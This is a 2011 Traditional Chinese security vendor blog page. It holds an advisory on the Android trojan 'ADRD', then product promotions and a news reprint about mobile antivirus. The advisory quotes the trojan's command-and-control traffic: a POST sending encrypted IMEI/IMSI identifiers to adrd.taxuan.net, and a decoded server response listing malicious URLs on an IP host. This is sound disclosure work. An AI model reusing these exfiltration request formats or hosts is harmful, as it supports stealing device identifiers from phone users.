[ 安全通報 ] 14 二月, 2011 06:52

     義集思實驗室一直致力於保護行動裝置使用者的安全, 我們從兩年前就開始分析以及收集 Android 套件. 今天我們發現一個還未被其他安全服務公司所通報過的新木馬"ADRD".

      根據我們的分析, 惡意軟體的作者將原本正常的套件重新打包 (如同 GEINIMI 的散佈方式)並加入惡意代碼, 但特別集中於壁紙軟體. 這類壁紙軟體通常不會出現在程式面板上, 所以使用者很少注意到他們的存在. 這隻木馬會偷取個人資料, 如機器的 IMEI/IMSI碼, 然後送回遠端的主機, 並聽從遠端主機的命令行動. 受感染的套件會要求許多權限, 像是RECEIVE_BOOT_COMPLETED, ACCESS_NETWORK_STATE等等, 所以一旦這些事件發生, 可以在背景執行. 它也設定了一個定時的警告服務, 可以定時喚醒程式本身. 然而這隻程式比去年發現的"GEINIMI"木馬還要低調, 他不會傳送那麼多的訊息和命令, 也是用較少的頻寬, 使用者可能過了好幾個星期都沒意識到它的存在. 但它還是造成資料的外洩及頻寬的消耗.


木馬分析:

    此木馬註冊了許多接受器去攔截幾個事件, 像是開機完成(boot complete), 網路連接改變等等. 然後當事件發生時於背景開啟一個服務. 此服務首先使月 HTTP 傳送使用 DES 加密的字串到一個主機, 如下: 

POST /index.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a5471587b5db8848de8d7a2efc443455fa0839828c592920ddc1ec6ea1b3acf2b97d46 HTTP/1.1
HOST: adrd.taxuan.net

    經過解碼, 我們可以見到:

354059xxxxxxxxx&310260xxxxxxxxx&1&6&adrd.zt.cw.4

   

    由上可知, 它傳回 IMEI/IMSI碼, 木馬版本, 到主機上以決定下一步. 接著主機可能回傳一串 URL:

POST /pic.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a54715a7786e2a0e5e894e HTTP/1.1
RESPONSE(decoded):
B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#961a_w1|http://59.173.12.105/g/g.ashx?w=961a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#964a_w1|http://59.173.12.105/g/g.ashx?w=964a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#881d_w1|http://59.173.12.105/g/g.ashx?w=881d_w1|1|http://59.173.12.105/add/pk.aspx$%3Cbr%20/%3EB#1#978a_w1|http://59.173.12.105/g/g.ashx?w=978a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#979a_w1|http://59.173.12.105/g/g.ashx?w=979a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#609b_w1|http://59.173.12.105/g/g.ashx?w=609b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1044a_w1|http://59.173.12.105/g/g.ashx?w=1044a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999a_w1|http://59.173.12.105/g/g.ashx?w=999a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999b_w1|http://59.173.12.105/g/g.ashx?w=999b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999c_w1|http://59.173.12.105/g/g.ashx?w=999c_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059a_w1|http://59.173.12.105/g/g.ashx?w=1059a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1060a_w1|http://59.173.12.105/g/g.ashx?w=1060a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059b_w1|http://59.173.12.105/g/g.ashx?w=1059b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086d_w1|http://59.173.12.105/g/g.ashx?w=1086d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086e_w1|http://59.173.12.105/g/g.ashx?w=1086e_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086f_w1|http://59.173.12.105/g/g.ashx?w=1086f_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086g_w1|http://59.173.12.105/g/g.ashx?w=1086g_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086h_w1|http://59.173.12.105/g/g.ashx?w=1086h_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086r_w1|http://59.173.12.105/g/g.ashx?w=1086r_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086t_w1|http://59.173.12.105/g/g.ashx?w=1086t_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089b_w1|http://g.gxsmy.com/?w=1089b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089c_w1|http://g.gxsmy.com/?w=1089c_w1|1|http://59.173.12.105/add/pk.asp%3Cbr%20/%3Ex$B#1#1089d_w1|http://g.gxsmy.com/?w=1089d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#962a_w1|http://59.173.12.105/g/g.ashx?w=962a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#768b_w1|http://59.173.12.105/g/g.ashx?w=768b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#965a_w1|http://59.173.12.105/g/g.ashx?w=965a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#780b_w1|http://59.173.12.105/g/g.ashx?w=780b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#834b_w1|http://59.173.12.105/g/g.ashx?w=834b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#959a_w1|http://59.173.12.105/g/g.ashx?w=959a_w1|1|http://59.173.12.105/add/pk.aspx$


    接著一些 HTTP 的要求與結果來回傳送, 然後它在背景開啟一個 URL (本次分析的例子之一): http://wap.baidu.com/s?word=%e7%83%a8%e4%b9%8b%e5%9b%bd%e5%ba%a6&vit=uni&from=961a_w1

    這些惡意軟體的作者或許會從這些讓使用者連線上去的網站獲益, 然而使用者將有個人資料洩漏的風險與頻寬的消耗(高額電信帳單).

建議:


    (1) 不要從未知或是非官方網站下載與安裝程式套件, 只在信任的地方下載.
    (2)  記得安裝行動安全軟體像是免費的 "AegisLab Antivirus Free" (AppScan Beta)或付費版的 "Aegis Antivirus Elite", 並定時掃瞄. 以上兩個軟體目前均可辨認出這個木馬.

義集思實驗室

[ 產品訊息 ] 10 二月, 2011 15:35
Egis行動防毒安全工具版為一針對
Android 平台設計的資安工具, 包含:

(a)即時/手動掃描 可疑軟體
(b)手機遺失時, 遠端資料刪除/鎖機
(c)下載軟體前搜尋可疑軟體資料庫(文字/語音皆可)
(d)簡訊釣魚連結檢查

   可偵測超過60隻近來遭大陸感染頻繁之給你米/PJAPPS 病毒程式, 目前市面上諸多防毒軟體均無法全面偵測, 包含lookout,AVG, Trend等

   慶祝在 Google Market 上架, 二月底前特價USD 3.99 (NT 115), 三月將調回原價 USD 7.99, 時間有限, 敬請把握. 相關新聞可參見http://www.lionic.com/News/more.asp?Btfiy3j=

[ 產品訊息 ] 08 二月, 2011 18:40

    "AegisLab Antivirus Free" (Appscan Beta) 是義集思實驗室開放給使用者免費下載使用的安全軟體, 用意在於收集使用者反饋, 並開發新功能的實驗性軟體. 雖然是試用版, 但是仍有正式版的品質與完整測試流程. 我們很高興目前已經有超過 82,000 人次下載使用囉!

    要下載 "AegisLab Antivirus Free", 可以至 Android 官方 Market 網站, http://market.android.com/details?id=com.aegislab.sd3prj.antivirus.free

    也可以購買正式版本, "AegisLab Antivirus Elite", Android 官方 Market 網站, http://market.android.com/details?id=com.aegislab.sd3prj.egismobile

 義集思實驗室

[ 產品訊息 ] 08 二月, 2011 13:13

   去年下半年開始, 在Android平台上, 惡意軟體開始大量出現. 我們認為今年會出現更多! 義集思實驗室做了一個簡單快速的偵測率比較, 受測對象有EgisMobile(現更名為 AegisLab Antivirus Elite), NetQin, Lookout 和 360. 在這輪測試中 Egis Mobile拿到最高的偵測率.

 

   現在差不多該是給你的 Android 平台(手機或平板電腦)裝上防毒或防惡意軟體的套件了, 畢竟它沒你想像中的安全!

-義集思實驗室

[ 產品訊息 ] 01 二月, 2011 13:58
    整合多項安全功能的 Egis 行動防毒安全工具正式版(for Android)已經在遠傳S市集上架. Egis行動防毒安全工具為一針對Android 平台設計的資安工具, 包含:

(a)即時/手動掃描 可疑軟體 (包含最新的病毒和木馬)
(b)手機遺失時, 遠端資料刪除/鎖機
(c)下載軟體前搜尋可疑軟體資料庫(文字/語音皆可)
(d)簡訊釣魚連結檢查

軟體支援語言:中英文

下載網址: http://app.fetnet.net/aps/App/allSoftware_detail.action?appId=com.aegislab.sd3prj.egismobile

[ 新聞 ] 01 二月, 2011 10:02

原文刊載於: http://www.digitimes.com.tw/tw/dt/n/shwnws.asp?CnlID=13&id=0000217663_H4L5C9WY7E20EY2P9J6IW&ct=a

2011/02/01-費斯瑋  

隨著Android手機市場的快速成長,行動用戶可以隨時隨地透過網路下載、安裝各種類型的應用程式,Android開放軟體平台也迅速受到軟體開發者的歡迎,截至2010年底為止,Android系統的相關應用程式己超過20萬種,持續吸引眾多手機用戶下載使用。

然而,當手機用戶在安裝新應用程式時,常常會因為希望能快速安裝,又無法立即從應用程式的揭露資訊判斷此程式是否具有風險,即輕率按下同意安裝的按鍵,殊不知,應用程式可透過Android環境輕易取得各項個人資訊,例如通訊錄、郵件內容及簡訊等等,所以屢屢成為駭客及有心人士惡意攻擊的最愛,他們只要取得這些個資,就可以加以利用並進行各類非法的資安危害事件,例如將使用者的隱私機密資料出售給犯罪集團,或於簡訊中加入釣魚網頁等等侵害安全的手法。最近最熟為人知的即是在Android手機上的Geinimi病毒傳播,它會在使用者不知情的情況下,開啟後門程式並下載惡意軟體至用戶手機。因此,Android手機若能有一套健全的安全防衛機制來把關,將使用戶更放心地使用智慧型手機。

Egis Mobile Anti-Virus Security解決方案。
擁有完整的防毒、防駭開發經驗及專業病毒碼、駭客入侵碼及惡意網站資料庫等,是目前資安防毒解決方案供應商優先必備的條件,廠商利用完整的資訊安全資源及經驗,在Android平台推出各項資安解決方案,包含Badlink Check、SMS Link Guard及AppScan等,紛紛獲得手機用戶的正面評價,確實有效地提升用戶使用Android平台的安全性。

資安防毒解決方案供應商鴻璟科技表示,一套運作在Android平台上的完整資訊安全防衛,須具備完整的掃瞄機制及最新的資料庫更新功能,以進行應用程式風險分析及評估警示 (APP analysis & risk alarm)。此軟體必須可以掃瞄用戶手機內的所有應用程式,而掃瞄結果須能提醒用戶,應用程式是否具有威脅性或具有哪些風險類別,包含病毒、使用者權限、惡意軟體、間諜軟體、遠端控制工具、攻擊工具及廣告等。另外還需要配備其它功能,如釣魚簡訊防衛、手機遺失可遠端鎖機以防盜用、可由遠端清除手機資料以防有心人士偷窺,並且能更新Server端最新的資料庫以達到最及時的手機安全防護。

綜合上述,優良的資訊安全防衛系統必備功能如下:
●軟體掃瞄快,提高用戶使用意願。
●軟體檔案精簡,不佔用太多軟硬體資源。
●資料庫數量充足且齊全,可提供多種風險類別偵測(包含廣告及軟體安全性漏洞揭露等)。
●提供語音及文字查詢資料庫功能。

鴻璟科技於2011年1月份正式推出一套運用在Android平台的完整資訊安全防衛解決方案-Egis Mobile Anti-Virus Security(現更名為 AegisLab Antivirus Elite)。依據鴻璟科技在資安領域的專業技術及經驗,未來也可以針對欲上傳到Android軟體商店的應用程式,提供預先掃毒及分析之服務,讓軟體商店成為使用者安心下載的來源,有效遏阻駭客在Android平台帶來的威脅。